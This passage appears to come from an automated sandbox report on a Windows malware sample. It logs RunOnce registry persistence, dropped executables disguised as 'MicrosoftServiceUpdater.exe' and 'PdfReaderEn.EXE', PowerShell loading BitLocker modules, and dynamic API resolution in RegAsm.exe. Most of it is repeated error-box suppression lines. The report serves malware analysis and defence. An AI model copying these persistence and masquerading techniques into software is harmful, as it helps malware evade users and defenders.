                      Source: C:\Users\user\Desktop\6706e721f2c06.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,33_2_0041CBE1
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
